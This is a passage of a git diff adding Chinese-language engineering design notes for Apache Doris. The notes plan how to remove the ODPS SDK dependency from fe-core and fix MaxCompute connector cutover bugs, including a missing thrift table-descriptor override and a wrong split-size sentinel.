**Q2 = fe-core 依赖树彻底无 odps(2026-06-09 升级,覆盖 [D-027] 决定 2)。** 不止删 fe-core/pom 两个直接 odps 块,**外加**经**方案 A**(§8)把 `MCUtils` 下沉到 be-java-extensions、再从 `fe-common/pom.xml` 删 `odps-sdk-core` → fe-core 不再有任何**直接或传递**的 odps。原 [D-027] 决定 2「direct-only、接受 fe-common 传递」被用户 2026-06-09 反转。 +- **后果(须知,by design,非缺陷)**:删后 `grep -rn "com.aliyun.odps" fe/fe-core/src` = **∅**,但 `grep -rni "maxcompute\|max_compute\|odps" fe/fe-core/src/main` 仍 **>0**(SPI 胶水 + 镜像兼容串保留)。若日后要真正「零词元」= 另起 full-purge 任务(泛化 block-id thrift / 各 MC 枚举 / session var;fe-common 的 odps 已由 §8 解耦、不在此列),本 session 已评估其代价与**升级兼容下限**(GsonUtils 3 兼容子类串 + `InitCatalogLog.Type.MAX_COMPUTE` + 已持久化 `TransactionType.MAXCOMPUTE` 须留,否则断 pre-SPI 镜像/editlog 滚动升级),用户当前**不取**。 + +### 7.2 @HEAD 校验结果(删除单元仍准确,2026-06-09) +- ✅ **删除单元 = 20 文件**(非 §0/§1 早先写的「21」—— 其自身枚举即 10+8+2=20,off-by-one 已就地修正);20 文件全部存在于当前 HEAD。 +- ✅ **Linchpin(pom-drop 安全性)**:`fe-core/src` 内 import `com.aliyun.odps.*` 的文件 = **8**(7 main + 1 test),**全部**在删除单元内;删除单元外 residual = **∅** → 删完 fe-core 零 odps 源引用,pom drop 不破编译。 +- ✅ fe-core/pom 两个 odps 块在 `:364`(odps-sdk-core) / `:379`(odps-sdk-table-api)(§4 的「~362–381」仍准)。 +- ✅ 自本 doc(2026-06-07)后近 commit `effd8edbfdb`(fix explain) / `2b8a732682c`(add connector type to explain) **只动 `PluginDrivenScanNode`(KEEP 集,通用 SPI)** + 新增分区计数测 + 审计 md,**未改 legacy footprint**。 +- ✅ **任务 0(静态分发完整性审计)已 DONE** —— `plan-doc/reviews/P4-cutover-completeness-audit-2026-06-08.md`(裁决 PASS:24/24 op 全路由、零 legacy 运行时回退)。即 🅱 删除的**静态前置门已绿**。 +- ⚠️ **§2 行号已漂移**:多处 `~:NNN` 较 HEAD 偏 +5~+43(doc 写于 2026-06-07)。照 §5 要求——执行前按符号 re-grep,**勿信行号**。 + +### 7.3 执行前置门(下个 session 开删前须全绿) +1. 🅰 **live ODPS e2e 验证绿(用户跑,硬门,当前 OPEN)** —— `OdpsLiveConnectivityTest`(4 个 `MC_*` env)+ 手测 smoke(读/裁剪/下推/limit-split/batch/CAST + 写/INSERT/OVERWRITE/txn/动静态分区 + 全 DDL/元数据)。[D-027]:删 legacy = 去掉易回退的 fallback,故须 live 绿后才删。 +2. ⬜ **T3**(登记 4 条 Tier-3 DV:GAP3/4/9/10,doc-only)—— 可与删除同批或前置;非编译阻塞。 +3. ✅ **DOC**(本 Batch-D redline 扩充)—— 本 session 完成(§1 补 LIMIT-split 第 3 副本红线 + 本 §7 校验)。 + +### 7.4 验收基线(删除 + pom drop 后须满足) +- `grep -rn "MaxComputeExternal\|MCTransaction\b\|MCInsert" fe/fe-core/src/main`:当前 **151** 行 → 删后须**仅剩 §3 KEEP 集**(`GsonUtils` 3 个字符串字面量 `"MaxComputeExternal{Catalog,Database,Table}"` + PluginDriven* 内引用 legacy 行为的注释)。 +- `grep -rn "com.aliyun.odps" fe/fe-core/src` → **∅**。 +- `mvn -pl :fe-core dependency:tree | grep odps` → **完全为空**(§8 方案 A 下沉 MCUtils + 删 fe-common odps 后,直接 + 传递 odps 均消失)。 +- 总词元 `grep -rni "maxcompute\|max_compute\|odps" fe/fe-core/src/main`:当前 **703** → 删后仍 >0(Q1 保留胶水,非缺陷)。 + +--- + +## 8. fe-common odps 解耦(方案 A,用户定 2026-06-09)—— 使 fe-core 依赖树彻底无 odps + +> 背景:`fe-common` 装 `odps-sdk-core` 仅为 `common/maxcompute/MCUtils`(odps 客户端工厂)服务,而 MCUtils 删 legacy 后**唯一消费者 = be-java-extensions**(`MaxComputeJniScanner` / `MaxComputeJniWriter`)。fe-core 经 fe-common 白拿 odps 是假耦合。用户定**方案 A**:把 MCUtils 下沉到真正用它的 BE 扩展,fe-common 去 odps。 + +**消费者核实(2026-06-09 @HEAD)**: +- `MCUtils`(import `com.aliyun.odps.*` + `com.aliyun.auth.credentials.*`):be-java-ext 2 处 `createMcClient` + fe-core `MaxComputeExternalCatalog`(§1 删)→ **删后仅 be-java-ext**。 +- `MCProperties`(纯常量、零 import):be-java-ext `MaxComputeJniWriter` + fe-core `DatasourcePrintableMap`(KEEP)→ **留 fe-common**。 +- 新 FE 连接器 `fe-connector-maxcompute` **不用** fe-common 的 MC 类(有自有 `MCConnectorClientFactory`)。 +- be-java-ext 经 `java-common→fe-common`(`provided`)拿 MC 类,且自带 `odps-sdk-core` / `odps-sdk-table-api`。 + +**步骤(须在 §1 删除 `MaxComputeExternalCatalog` 之后 / 同批,否则 fe-core 仍需 MCUtils)**: +1. 移 `fe/fe-common/.../common/maxcompute/MCUtils.java` → `fe/be-java-extensions/max-compute-connector/.../org/apache/doris/maxcompute/MCUtils.java`;包名 `org.apache.doris.common.maxcompute` → `org.apache.doris.maxcompute`。`MCUtils` 内保留 `import org.apache.doris.common.maxcompute.MCProperties`(仍在 fe-common、be-java-ext 可达)。 +2. `MaxComputeJniScanner` / `MaxComputeJniWriter` 删 `import org.apache.doris.common.maxcompute.MCUtils`(与 MCUtils 同包后无需 import)。 +3. `MCProperties.java` **留 fe-common**(odps-free 常量;fe-core `DatasourcePrintableMap` 仍需)。 +4. 删 `fe/fe-common/pom.xml` 的 `odps-sdk-core` 块(~:137–154)。 +5. 守门:`grep -rn "com.aliyun.odps" fe/fe-common/src` = **∅**(验 MCUtils 是 fe-common 唯一 odps 用户)→ `mvn -pl :fe-common -am compile`(fe-common 无 odps 仍编译)→ `mvn -pl be-java-extensions/max-compute-connector compile`(MCUtils 在新家编译;确认 `com.aliyun.auth.credentials.*` 经 odps-sdk-core 传递的 credentials-java 可达,**若报缺则给该模块 pom 显式补 aliyun-auth 依赖**)→ `mvn -pl :fe-core dependency:tree | grep odps` = **∅**。 +6. commit `[P4-T09] sink MCUtils into BE extension; drop odps from fe-common`(与 §4 fe-core pom drop 同批或紧随)。 + +**与 §4 关系**:§4 删 fe-core **直接** odps;§8 断 fe-common→fe-core 的**传递** odps。二者合一 = fe-core 依赖树**彻底无 odps**(需求 ② 严格满足)。**运行时安全性**:删 legacy 后 fe-core 不再 class-load 任何 odps/MCUtils 符号(仅 `DatasourcePrintableMap` 引 odps-free 的 `MCProperties`),故 fe-core 无 odps 不会 `NoClassDefFoundError`。 diff --git a/plan-doc/tasks/designs/P4-cutover-fix-design.md b/plan-doc/tasks/designs/P4-cutover-fix-design.md new file mode 100644 index 00000000000000..8fce1994006007 --- /dev/null +++ b/plan-doc/tasks/designs/P4-cutover-fix-design.md @@ -0,0 +1,498 @@ +# P4 — MaxCompute 翻闸缺口修复设计 (review 后续) + +> 来源: 翻闸对抗 review 报告 `plan-doc/reviews/P4-cutover-review-findings.md`(41 存活发现)。 +> 本设计**只覆盖用户选定的 6 个 blocker/核心-阻断 major**; 其余存活 major/minor 见文末「本批次外(待定)」。 +> 状态: **设计待审 —— 未写码**。建议 task id: P4-T06d(cutover gap-fix, 续 T06a/b/c)。生成方式: 每 issue 1 设计 agent + 1 对抗 critic。 +> 前置关系: 本批修复落 + live 验证全绿 = 翻闸真正完成门 → 才解锁 Batch D。日期: 2026-06-07。 + +## 0. 范围与阶段 + +| 阶段 | issue | severity | 层 | 依赖 | 一句话 | +|---|---|---|---|---|---| +| 阶段 1 | FIX-READ-DESC | blocker | fe-connector-maxcompute | — | MaxComputeConnectorMetadata 缺 buildTableDescriptor override,导致翻闸后 toThrift 走 null 兜底产 SCHEMA_TABLE(无 mcTable),BE file_scanner 无条件 static_cast 到 MaxComputeTableDescriptor 类型混淆崩溃;修法为在 MC connector 补 override 产出 MAX_COMPUTE_TABLE+TMCTable,并把 endpoint/quota/properties 透传进 metadata。 | +| 阶段 1 | FIX-READ-SPLIT | blocker | fe-connector-maxcompute | — | byte_size split 在翻闸 connector 用 .length(splitByteSize) 回填 rangeDesc.size,丢失 legacy 的 -1 sentinel,使 BE 把 byte-size split 误判为 row-offset → 默认路径静默读出错误数据;改 MaxComputeScanPlanProvider.java:268 为 .length(-1) 恢复 sentinel。 | +| 阶段 2 | FIX-DDL-ENGINE | blocker | fe-core | P4-batchD-maxcompute-removal-design.md:100 计划删 CreateTableInfo:~390/:912 的 instanceof MaxComputeExternalCatalog 分支 —— 须改为先落 PluginDriven 分支、Batch D 仅删 legacy MC 分支(顺序依赖,否则坐实回归) | paddingEngineName/checkEngineWithCatalog 在 MC instanceof 分支后新增 PluginDrivenExternalCatalog 分支(keyed on getType()=="max_compute"→ENGINE_MAXCOMPUTE,经 helper 通用化),纯 fe-core 最小改动,镜像 legacy 自动补 engine=maxcompute 行为;须先于 Batch D 删 legacy MC 分支落地。 | +| 阶段 2 | FIX-DDL-REMOTE | major | fe-core | DDL-P1 | 在 PluginDrivenExternalCatalog 的 createTable/dropTable override 内先用 getRemoteName/getRemoteDbName 把本地名解析成 ODPS 远端真名再交给连接器,mirror legacy MaxComputeMetadataOps,纯 FE 改动、不扩 SPI、不动连接器。 | +| 阶段 3 | FIX-PART-GATES | major | fe-core | — | 给 PluginDrivenExternalTable 加 isPartitionedTable/getPartitionColumns override(keyed on connector 的 partition_columns 声明),并在 PartitionsTableValuedFunction.analyze 双网关补 PluginDriven 分支,打通 T06c 已接好的 SHOW PARTITIONS / partitions() TVF BE handler;不删 Batch-D 红线分支。 | +| 阶段 4 | FIX-WRITE-ROWS | major | fe-core | — | 在 PluginDrivenInsertExecutor.doBeforeCommit() 的事务模型分支(connectorTx != null)补一行 loadedRows = connectorTx.getUpdateCnt(),回填翻闸丢失的 affected-rows,镜像 legacy MCInsertExecutor;getUpdateCnt 全链路已就绪,纯 fe-core 一处赋值。 | + +阶段排序理由: +- **阶段 1 — 恢复读路径可用 (gate live SELECT)**: 两 blocker 直接决定 SELECT 能否工作; BE 不改(BE 仍按 max_compute 期望 MC 描述符), 修在 FE+connector。先修这层, 否则任何 live 读验证都不可信。 +- **阶段 2 — 恢复 DDL 可用**: engine 门阻断无 ENGINE 的 CREATE TABLE(blocker, 分析期即报错); 远端名映射保 DDL 在 name-mapping 下的数据正确性(major)。 +- **阶段 3 — 恢复分区可见 (partitions TVF / SHOW PARTITIONS)**: analyze 网关 + 分区元数据 override, 打通 T06c 已接但当前不可达的 BE handler; 含 Batch-D 红线守护。 +- **阶段 4 — 写回正确性 (affected rows)**: 数据已写对, 仅修客户端/audit 报告行数; 独立小改, 可与任意阶段并行。 + +> 提交纪律(项目硬约定): **每 issue 独立 commit**, 改 fe-core 带 `-pl :fe-core -am`, 改连接器带对应 `-pl`, 读真实 BUILD/MVN_EXIT/CS_EXIT, import-gate 从 repo 根跑。 + +## 1. 🔴 Batch-D 红线(修复期必须守住) + +- **勿删** `PartitionsTableValuedFunction.java:173` 的 `MaxComputeExternalCatalog` 分支。Batch D 设计 §2 称「T06c 已加 PluginDriven 分支, Batch D 删 MC 分支」—— 前提经本轮 git 核实为**假**(commit `2cf7dfa81ad` 只改 `MetadataGenerator.java`, 从未触该 TVF)。照删 = partitions() 对 MC 永久不可用。正确动作 = FIX-PART-GATES 先**新增** PluginDriven 分支, Batch D 再仅删残留 legacy MC 引用。 + +## 2. 逐 issue 修复设计 + +### 阶段 1 — 恢复读路径可用 (gate live SELECT) + +### FIX-READ-DESC — 读路径 TableDescriptor 类型混淆 — 补 buildTableDescriptor override 产 TMCTable + +- **Problem**: 翻闸后(catalog 为 `PluginDrivenExternalCatalog`/type=`max_compute`)对 MaxCompute 外表的任意 `SELECT` 在 BE 端非法向下转型崩溃或读出垃圾数据。触发条件:任何走 JNI scanner 的 MC 读(`range.table_format_params.table_format_type == "max_compute"`)。用户可见症状:查询崩(段错误/未定义行为)或返回错误数据 + 无鉴权(endpoint/project/quota/凭证全为越界内存)。legacy 路径正常,翻闸即坏 —— 回归=是,severity=blocker。 + +- **Root Cause**: 精确链路: + - FE: `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:249-258` —— `toThrift()` 调 `metadata.buildTableDescriptor(...)`,MC connector 未 override → 命中 SPI 默认 `fe/fe-connector/fe-connector-api/.../ConnectorTableOps.java:146-151` 返 `null` → 走 `:257` 兜底产出 `TTableType.SCHEMA_TABLE` 描述符,且**不含** `mcTable` 字段。 + - BE descriptor 工厂 `be/src/runtime/descriptors.cpp:635-636` 据 `SCHEMA_TABLE` 创建 `SchemaTableDescriptor`(非 `MaxComputeTableDescriptor`,后者仅 `:653-654` 的 `MAX_COMPUTE_TABLE` 分支创建)。 + - BE scanner `be/src/exec/scan/file_scanner.cpp:1069-1070` 在 `table_format_type=="max_compute"` 时**无条件** `static_cast(_real_tuple_desc->table_desc())` —— 把一个实际是 `SchemaTableDescriptor*` 的指针向下转成 `MaxComputeTableDescriptor*`,随后 `mc_desc->init_status()` 及 reader 读 `_endpoint/_project/_quota/_props` 全是越界/垃圾内存。 + - 注:`MaxComputeTableDescriptor` 构造函数 `be/src/runtime/descriptors.cpp:289-320` 直接读 `tdesc.mcTable.region/project/table/...`(部分字段无 `__isset` 守卫),即便侥幸进了该分支也要求 `mcTable` 必须被 set;只有 `endpoint`/`quota` 缺失才走 `init_status` 报错路径,其余字段缺失即 UB。 + - 直接根因:`fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java` 缺 `buildTableDescriptor` override(对比已 override 的 `JdbcConnectorMetadata.java:182-217` / `EsConnectorMetadata.java:121-131`)。 + +- **Design**: 在 `MaxComputeConnectorMetadata` 新增 `buildTableDescriptor` override,产出 `TTableType.MAX_COMPUTE_TABLE` 的 `TTableDescriptor` 并 `setMcTable(TMCTable)`,mirror legacy `MaxComputeExternalTable.toThrift()`(`fe/fe-core/.../maxcompute/MaxComputeExternalTable.java:305-322`)的可观察行为。 + - 方法签名(与 SPI default 完全一致,override 即可,**SPI 无需扩展**): + `public org.apache.doris.thrift.TTableDescriptor buildTableDescriptor(ConnectorSession session, long tableId, String tableName, String dbName, String remoteName, int numCols, long catalogId)` + - 要 set 的 `TMCTable` 字段(对照 `gensrc/thrift/Descriptors.thrift:455-467` 与 legacy):`setEndpoint(...)`、`setQuota(...)`、`setProject(...)`、`setTable(...)`、`setProperties(...)`。其余 thrift 字段(region/access_key/secret_key/public_access/odps_url/tunnel_url)legacy 也未 set(已 `// deprecated`),保持不 set —— 凭证经 `properties` map 下传,与 legacy 一致,BE `descriptors.cpp:313` 走 `__isset.properties` 的 likely 分支。 + - 字段取值来源:connector 已在 `MaxComputeDorisConnector` 持有 `getEndpoint()` / `getQuota()` / `getProperties()` / `getDefaultProject()`(`MaxComputeDorisConnector.java:194-211`),但 `MaxComputeConnectorMetadata` 当前 ctor 只接 `odps/structureHelper/defaultProject`(`:72-78`),**缺 endpoint/quota/properties**。最小改动:扩 `MaxComputeConnectorMetadata` 构造参数,在 `MaxComputeDorisConnector.getMetadata`(`:160-161`)把 `endpoint/quota/properties` 透传进去(prop 源已现成,无需 re-resolve)。 + - **`project`/`table` 取值是关键 parity 判定点(显式标注)**:legacy 用 `tMcTable.setProject(dbName)` 其中 `dbName=db.getFullName()`(本地名)、`setTable(name)`(本地名)—— 因 MC 历史路径 local==remote。SPI `toThrift` 调用点已传 `dbName=db.getRemoteName()`、`remoteName=getRemoteName()`(`PluginDrivenExternalTable.java:247,250`)。BE 用 `_project/_table` 去 ODPS 建读 session,**必须是 ODPS 真实可寻址名(remote)**。故 override 应 `setProject(dbName 参数)`(已是 remote)、`setTable(remoteName 参数)`(remote),而非 legacy 的本地名。这在 `meta_names_mapping`/`lower_case_meta_names` 生效时与 legacy 行为有别,但属"翻闸更正确"(legacy 用本地名在映射开启时本就会寻址错表),与 review 中 DDL-P3/DDL-C2 同源;此处取 remote 是有意修正,不算回归。建议在 commit message / OQ 登记。 + - **通用性判定**:这是 MC 专有(MC connector 缺 override),非通用插件层缺口 —— `PluginDrivenExternalTable.toThrift` 的 dispatch + SPI hook + null 兜底机制本身正确且已 keyed on connector(每个 connector 自带 typed descriptor,jdbc/es 已证);修法落在 MC connector,无需碰 fe-core dispatch、无需 hardcode maxcompute。fe-core 的 `getEngineTableTypeName`(`:232-233`)已用 `getType()=="max_compute"` 而非 hardcode,符合既有约定。 + +- **Implementation Plan**(逐文件逐方法,均为单 issue 独立 commit): + 1. [fe-connector-maxcompute] `MaxComputeConnectorMetadata.java`:扩构造函数,新增 `private final String endpoint; private final String quota; private final Map properties;` 三字段(import 复用现有 `java.util.Map`),ctor 增对应参数并赋值。 + 2. [fe-connector-maxcompute] `MaxComputeConnectorMetadata.java`:新增 `@Override public org.apache.doris.thrift.TTableDescriptor buildTableDescriptor(...)`:new `TMCTable`,`setEndpoint(endpoint)`/`setQuota(quota)`/`setProject(dbName)`/`setTable(remoteName)`/`setProperties(properties)`;new `TTableDescriptor(tableId, TTableType.MAX_COMPUTE_TABLE, numCols, 0, tableName, "")`,`setMcTable(...)`,return。全程用全限定 `org.apache.doris.thrift.*`(对齐 jdbc/es override 的写法,避免新 import 触 import-gate;若改用 import 须同步 checkstyle import 顺序)。 + 3. [fe-connector-maxcompute] `MaxComputeDorisConnector.java:160-161` `getMetadata`:`new MaxComputeConnectorMetadata(odps, structureHelper, defaultProject, endpoint, quota, properties)`(字段已在 ctor/doInit 就绪)。 + 4. [be] 无需改动(`MAX_COMPUTE_TABLE` 分支与 `MaxComputeTableDescriptor` 已存在,本修法令 FE 重新走该分支)。 + 5. [thrift] 无需改动(`TMCTable` 字段集已满足,见 `Descriptors.thrift:455-467`)。 + 6. [fe-core] 无需改动(`PluginDrivenExternalTable.toThrift` 兜底逻辑保留作其他无 typed-descriptor 的 connector 的安全网;本修法令 MC 不再走兜底)。 + - 守门:仅改连接器 → `mvn ... -pl :fe-connector-maxcompute`(不触 fe-core,无需 `-am`/`-pl :fe-core`)。 + +- **Risk**: + - 回归风险低:纯新增 override + ctor 透传,不改 fe-core dispatch、不改 BE、不改 thrift、不改其他 connector。jdbc/es/trino 走各自 override 或 null 兜底,零影响。 + - 不触 keep 集(legacy `MaxComputeExternalTable.toThrift` 仍在,翻闸下不被调用;Batch D 删除 legacy 时一并移除,与本 fix 无序约束冲突)。 + - checkstyle/import-gate:用全限定名规避新 import;若团队约定要 import,则需校 import 顺序与 unused。 + - 唯一语义差异点:`project`/`table` 取 remote 名(上文已标注,有意修正,与 DDL 远端名修复同源);若 reviewer 坚持严格 mirror legacy 本地名,会在映射开启时寻址错表 —— 应选 remote。 + - BE `descriptors.cpp:289-320` 对 region/access_key 等字段无 `__isset` 守卫:本 fix 不 set 这些字段,thrift 默认空串 → BE 读到空串而非 UB(因为现在 mcTable 整体被 set),与 legacy 完全一致(legacy 同样不 set 这些)。 + +- **Test Plan**: + - UT(放 `fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/`):新增纯 Java 单测(无需 live ODPS、无 fe-core 依赖,沿用该模块 child-first loader 约定,见 `OdpsClassloaderIsolationTest.java`)直接 new `MaxComputeConnectorMetadata`(传入构造好的 endpoint/quota/properties stub),调 `buildTableDescriptor`,断言:① 返回非 null;② `getTableType()==TTableType.MAX_COMPUTE_TABLE`;③ `isSetMcTable()==true`;④ `getMcTable().getEndpoint()/getQuota()/getProject()(==dbName 参数=remote)/getTable()(==remoteName 参数)/getProperties()` 与输入一致。该测试 encode WHY:断 thrift 类型与 mcTable 存在性,正是 BE `static_cast` 与 `descriptors.cpp` 凭证读取所依赖的契约(Rule 9)。jdbc/es 当前无对应 UT,本测试补齐该 connector 的描述符契约门。 + - E2E(`regression-test/suites/external_table_p2/maxcompute/`,需 live ODPS,user-run):在翻闸开关下跑 `test_external_catalog_maxcompute.groovy` 与 `test_max_compute_all_type.groovy` 的 `SELECT`(断言点:查询不崩、行数/数据与 `.out` 基线一致 —— 验证 BE 拿到合法 `MaxComputeTableDescriptor` + endpoint/project/quota/凭证正确,即不再走 SCHEMA_TABLE 兜底);`test_max_compute_partition_prune.groovy` 的基础整表 `SELECT count(*)` 验证读路径打通(注:分区裁剪本身是 READ-P3 另一 issue,此处只断"读得出正确全量数据")。断言锚点为既有 `.out` 文件(`regression-test/data/external_table_p2/maxcompute/*.out`)。 + +**Open questions**: project/table 取 remote 名(dbName/remoteName 参数)而非 legacy 的本地名:在 meta_names_mapping/lower_case_meta_names 开启时与 legacy 行为有别。判定为有意修正(与 DDL-P3/DDL-C2 远端名修复同源),但需 reviewer 确认是否接受作为翻闸基线,或要求严格 mirror legacy 本地名。 · BE descriptors.cpp:289-320 对 region/access_key/secret_key/public_access/odps_url/tunnel_url 无 __isset 守卫;本 fix 不 set 这些(同 legacy)→ thrift 默认空串。需确认无任何 BE 路径依赖这些 deprecated 字段非空(凭证全经 properties map,已核 descriptors.cpp:313 走 properties 分支)。 · MaxComputeConnectorMetadata 改用全限定 thrift 类名(对齐 jdbc/es)还是新增 import —— 取决于该模块 checkstyle import-gate 约定,需在实现时确认。 + +#### 🔎 对抗 critic — verdict: `sound` + +**需修正(corrections)**: +- 设计 Risk/Design 里把'project/table 取 remote 名'描述成与 legacy 有别的、需 reviewer 容忍的语义差异,论证迂回。实际核查更强:SPI 读 session 本身就用 remote 名构建——PluginDrivenScanNode.java:130-131 用 db.getRemoteName()/table.getRemoteName() 调 getTableHandle,MaxComputeScanPlanProvider 据此 handle 的 getTableIdentifier 建 TableReadSession,JNI scanner(MaxComputeJniScanner:136-148)对 project requireNonNull 并 odps.setDefaultProject(project)。故 descriptor 用 remote 名是与 SPI 读 session 一致的唯一正确选择;若按 reviewer 建议改回 legacy 本地名,反而会和 SPI 读 session 的 project 不一致。设计结论(取 remote)正确,但其'legacy 本地名因 local==remote 才侥幸工作'的根因解释不完整:legacy 读 session 也用本地名(MaxComputeExternalTable:167 getOdpsTableIdentifier(dbName,name)),legacy 整条链都是本地名,所以无映射时本就一致——这与 descriptor 修复无因果,设计把它说成'此处取 remote 是有意修正 legacy 寻址错误'略夸大:descriptor 的 project/table 对实际数据读几乎是 vestigial(真正寻址靠 FE 端预建的序列化 scan session)。 + +**遗漏(gaps)**: +- TTableDescriptor 6th 构造参数(dbName 字段)与 legacy 不一致,设计未 surface(违反 Rule 7): 设计 Implementation Plan step 2 写 `new TTableDescriptor(tableId, MAX_COMPUTE_TABLE, numCols, 0, tableName, "")` 用空串,而 legacy MaxComputeExternalTable.toThrift:318-319 用 `new TTableDescriptor(getId(), MAX_COMPUTE_TABLE, schema.size(), 0, getName(), dbName)` 传 dbName。该 6th 参映射到 thrift TTableDescriptor.dbName(field 8),BE descriptors.cpp:219 读入 TableDescriptor::_database。MC 读路径不用 _database(JNI scanner 用 TMCTable.project/table),故空串无害,但设计选了 jdbc 约定(jdbc override 也用 "")却与它声称要 mirror 的 legacy 行为分歧——设计文档把这点说成完全 mirror legacy,实际未 mirror 该参数,应显式登记此偏差。 +- UT 覆盖边界:设计的连接器内 UT 直接 new MaxComputeConnectorMetadata 调 buildTableDescriptor,只验证 override 自身产出,完全不覆盖 fe-core 侧 PluginDrivenExternalTable.toThrift(:249) 是否真的 CALL 该 override。若 toThrift dispatch/null 兜底逻辑回归(例如把 schema.size() 传错、或 remoteName/dbName 实参传反),该 UT 零感知。设计自述'补齐 descriptor 契约门'但 contract 的另一半(调用方正确传 remote 名 dbName=db.getRemoteName()、remoteName=getRemoteName())无任何门禁。 +- E2E 计划里 test_max_compute_partition_prune.groovy 仅跑 `SELECT count(*)` 整表读,断言'读得出全量数据'。但 count(*) 可能被优化为 BE meta/统计路径或不实际拉列数据,未必触发 file_scanner.cpp:1069 的 MaxComputeTableDescriptor static_cast。要真正验证 descriptor 修复,E2E 必须断言至少一个带列投影/带数据行的 SELECT(test_external_catalog_maxcompute.groovy 的 SELECT 列查询已覆盖,但 partition_prune 那条 count(*) 作为'读路径打通'证据偏弱)。 + +**额外风险**: +- prompt 质疑的 time_zone 缺失:已核实为非问题,但设计完全没提到 time_zone,说明设计者可能没意识到 JNI scanner(MaxComputeJniScanner:139)对 time_zone 做 requireNonNull。它之所以不崩,是因为 BE JNI 框架在 jni_reader.cpp:151 `_scanner_params.emplace("time_zone", _state->timezone())` 对所有 JNI scanner 通用注入,不走 descriptor。建议设计显式记录此依赖,否则后续若有人改 descriptor properties 覆盖逻辑(BE max_compute_jni_reader.cpp:62 先 mc_desc->properties() 再覆盖固定 key,但 time_zone 不在覆盖集),可能误删 time_zone 来源而不自知。 +- BE max_compute_jni_reader.cpp:62-66 的 properties 合并顺序:先 `auto properties = mc_desc->properties()`(=TMCTable.properties),再硬覆盖 endpoint/quota/project/table。意味着若 catalog properties map 里恰好含 key 'endpoint'/'quota'/'project'/'table'(裸 key,非 mc.*),会被 descriptor 字段覆盖——与 legacy 行为一致(legacy 也 setProperties(同一 map)),无回归;但设计未提 properties map 与这些保留 key 的交互,属隐含假设。 +- MaxComputeConnectorMetadata 当前 ctor(:72-78)被 MaxComputeDorisConnector.getMetadata(:160) 每次调用 new 一个新实例。设计扩 ctor 加 endpoint/quota/properties 透传后,需确保 getMetadata 处 endpoint/quota 已 doInit 就绪(getEndpoint/getQuota 内含 ensureInitialized,但 getMetadata 已先 ensureInitialized,且设计建议直接传字段而非 getter)。若改传裸字段 endpoint/quota 而非 getEndpoint()/getQuota(),需确认 getMetadata 调用时这俩字段非 null——getMetadata:159 已 ensureInitialized(),字段在 doInit 赋值,OK;此为低风险但设计 step 3 写 `new MaxComputeConnectorMetadata(odps, structureHelper, defaultProject, endpoint, quota, properties)` 直接引裸字段,依赖 ensureInitialized 已跑,需保证调用序不变。 +- checkstyle:设计建议全限定 org.apache.doris.thrift.* 规避新 import,符合 jdbc/es 既有写法;但新增 `private final Map properties` 复用现有 java.util.Map import 即可,这点 OK。无额外 import-gate 风险。 + +--- + +### FIX-READ-SPLIT — byte_size split size sentinel — 默认 split 回填 size=-1 + +- **Problem** + - 用户可见症状:在默认配置下查询 MaxCompute(翻闸后 PluginDriven 路径)外表会读出**错误/损坏的数据**(行数、列值与真实表内容不符,而非报错)。`select count(*) from `、`select *` 等都会命中。 + - 触发条件:`mc.split_strategy` 取默认值 `byte_size`(`MCConnectorProperties.DEFAULT_SPLIT_STRATEGY = SPLIT_BY_BYTE_SIZE_STRATEGY`),即不显式配置 split 策略时的默认路径。`row_offset` 策略和 limit-optimization 单 split 路径不受影响(它们本就走真实 offset/count)。 + - 严重性 blocker:即便绕过本 review 的另一个 blocker(READ-P1),默认读路径仍产出错误数据,且不报错——静默错误,最危险。 + +- **Root Cause** + - BE 用 `split_size == -1` 这一 sentinel 来区分两种 split 类型,这是唯一判别依据: + - BE C++ 把 `range.size` 透传给 Java scanner:`be/src/format/table/max_compute_jni_reader.cpp:70` → `properties["split_size"] = std::to_string(range.size)`。 + - Java scanner 据此判型:`fe/be-java-extensions/max-compute-connector/.../MaxComputeJniScanner.java:125-128` → `if (splitSize == -1) splitType = BYTE_SIZE; else splitType = ROW_OFFSET;`,再在 `open()`(:207-210)分别建 `new IndexedInputSplit(sessionId, (int) startOffset)`(BYTE_SIZE)或 `new RowRangeInputSplit(sessionId, startOffset, splitSize)`(ROW_OFFSET)。注意:scanner **完全不读** range 里携带的 `split_type` 属性/`getPath()` 的 `/byte_size`,只看 `split_size` 数值。 + - legacy 基线对 byte_size split 显式回填 `size = -1`:`fe/fe-core/.../maxcompute/source/MaxComputeScanNode.java:657-662` → `new MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, /*length=*/-1, /*fileLength=*/splitByteSize, ...)`(构造器签名 `MaxComputeSplit(path, start, length, fileLength, ...)`,见 MaxComputeSplit.java:40)——第 3 参 `length=-1`,`splitByteSize` 进第 4 参 `fileLength`(BE 不读)。随后 `:153 rangeDesc.setSize(maxComputeSplit.getLength())` ⇒ `setSize(-1)`。 + - 翻闸 connector **没有**回填 sentinel:`fe/fe-connector/fe-connector-maxcompute/.../MaxComputeScanPlanProvider.java:268` 对 byte_size split 用 `.length(splitByteSize)`(= 默认 268435456),而 `MaxComputeScanRange.populateRangeParams`(MaxComputeScanRange.java:122)做 `rangeDesc.setSize(getLength())` ⇒ `setSize(splitByteSize)`。于是 BE 收到 `split_size = 268435456 ≠ -1`,把 byte-size split **误判为 ROW_OFFSET**,用 `new RowRangeInputSplit(sessionId, startOffset=splitIndex, rowCount=splitByteSize)` 去读 → 错误数据。 + - 精确根因点:`MaxComputeScanPlanProvider.java:268`(`.length(splitByteSize)` 应等价为 sentinel,使 size 落到 -1)。 + +- **Design** + - 最小、最忠于 legacy 可观察行为的修法:**在 byte_size split 分支把传给 range 的 length 设为 -1**,使 `getLength()→setSize(-1)` 恢复 sentinel。等价于 legacy 的 `MaxComputeSplit(..., length=-1, fileLength=splitByteSize, ...)`。 + - 改 `MaxComputeScanPlanProvider.java:268`:`.length(splitByteSize)` → `.length(-1)`。 + - **[T06d 实施修正 — 原"只流向两处"声称有误]** `getLength()` 在该 byte_size range 里实际流向**三处**(非两处):`setPath` cosmetic 字符串(:120)、`setSize`(:122,BE sentinel,load-bearing),以及 `PluginDrivenSplit.java:42` 传入 `FileSplit.length`(再被 `FederationBackendPolicy.java:499` 一致性哈希分配、`FileQueryScanNode.java:430` `totalFileSize += getLength()` 消费)。结论不变(改后第三处看到 -1 而非 268435456,**良性且改善 legacy parity**——legacy 也是 -1),但原文"grep 全证实只两处"是事实错误。完整修正影响分析见 `P4-T06d-FIX-READ-SPLIT-design.md` §Risk(含 (a) 